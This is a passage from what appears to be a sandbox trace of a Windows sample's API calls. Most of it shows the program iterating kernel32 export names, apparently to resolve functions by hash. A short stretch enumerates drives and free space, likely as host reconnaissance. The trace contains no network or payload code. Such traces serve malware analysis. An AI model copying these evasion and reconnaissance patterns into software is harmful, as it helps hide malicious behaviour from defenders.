lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0178.286] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0178.286] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0178.286] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0178.286] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0178.286] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0178.286] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0178.286] lstrlenA (lpString="CREATETHREAD") returned 12 [0178.286] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0178.286] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0178.286] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0178.286] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0178.286] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0178.286] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0178.286] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0178.286] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0178.286] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0178.286] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0178.287] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0178.287] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0178.287] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0178.287] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0178.287] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0178.287] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0178.287] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0178.287] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0178.287] lstrlenA (lpString="CTRLROUTINE") returned 11 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0178.287] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0178.287] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0178.287] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0178.287] lstrlenA (lpString="DEBUGBREAK") returned 10 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0178.287] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0178.287] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0178.287] lstrlenA (lpString="DECODEPOINTER") returned 13 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0178.287] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0178.287] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0178.287] lstrcpyA (in: lpString1=0x239e340, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0178.288] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0178.288] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0178.288] lstrlenA (lpString="DELETEATOM") returned 10 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0178.288] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0178.288] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0178.288] lstrlenA (lpString="DELETEFIBER") returned 11 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0178.288] lstrlenA (lpString="DELETEFILEA") returned 11 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0178.288] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0178.288] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0178.288] lstrlenA (lpString="DELETEFILEW") returned 11 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0178.288] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0178.288] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0178.288] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0178.288] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0178.288] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0178.288] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0178.288] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0178.288] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0178.288] lstrcpyA (in: lpString1=0x239e340, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0178.288] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0178.289] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0178.289] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0178.289] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0178.289] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0178.289] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0178.289] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0178.289] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0178.289] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0178.289] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0178.289] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0178.289] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0178.289] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0178.289] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0178.289] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0178.289] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0178.289] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0178.289] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0178.289] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0178.289] lstrcpyA (in: lpString1=0x239e340, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0178.289] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0178.290] lstrcpyA (in: lpString1=0x239e340, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0178.290] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0178.290] lstrcpyA (in: lpString1=0x239e340, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0178.290] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0178.290] lstrcpyA (in: lpString1=0x239e340, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0178.290] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0178.290] lstrcpyA (in: lpString1=0x239e340, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0178.290] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0178.290] lstrcpyA (in: lpString1=0x239e340, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0178.290] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0178.290] lstrcpyA (in: lpString1=0x239e340, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0178.291] lstrcpyW (in: lpString1=0x2d0000, lpString2="|" | out: lpString1="|") returned="|" [0178.291] GetLogicalDriveStringsW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x5 [0178.291] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x360000 [0178.291] GetLogicalDriveStringsW (in: nBufferLength=0x5, lpBuffer=0x360000 | out: lpBuffer="C:\\") returned 0x4 [0178.292] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0178.292] GetDiskFreeSpaceW (in: lpRootPathName="C:\\", lpSectorsPerCluster=0x239efa4, lpBytesPerSector=0x239efa0, lpNumberOfFreeClusters=0x239ef9c, lpTotalNumberOfClusters=0x239ef98 | out: lpSectorsPerCluster=0x239efa4, lpBytesPerSector=0x239efa0, lpNumberOfFreeClusters=0x239ef9c, lpTotalNumberOfClusters=0x239ef98) returned 1 [0178.292] wsprintfW (in: param_1=0x2d0002, param_2="%c_%c_%d/%d|" | out: param_1="C_F_505630/523979|") returned 18 [0178.292] VirtualFree (lpAddress=0x360000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.292] lstrlenA (lpString="kernel32.dll") returned 12 [0178.293] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0178.293] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.293] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.293] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.293] lstrlenA (lpString="ADDATOMA") returned 8 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.293] lstrlenA (lpString="ADDATOMW") returned 8 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.293] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.293] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.293] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.293] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.293] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.293] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.293] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.293] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.293] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.293] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.293] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.293] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.293] lstrcpyA (in: lpString1=0x239e35c, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.293] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.294] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.294] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.294] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.294] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.294] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.294] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.294] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0178.294] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.294] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.294] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.294] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.294] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.294] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.294] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.294] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.294] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.294] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.294] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.294] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.295] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.295] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.295] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.295] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.295] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.295] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.295] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.295] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.295] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.295] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0178.295] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.295] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.295] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.295] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.295] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.295] lstrcpyA (in: lpString1=0x239e35c, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.295] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.295] lstrcpyA (in: lpString1=0x239e35c, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0178.295] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.295] lstrcpyA (in: lpString1=0x239e35c, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.295] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.295] lstrcpyA (in: lpString1=0x239e35c, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.295] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.295] lstrcpyA (in: lpString1=0x239e35c, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.295] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.295] lstrcpyA (in: lpString1=0x239e35c, 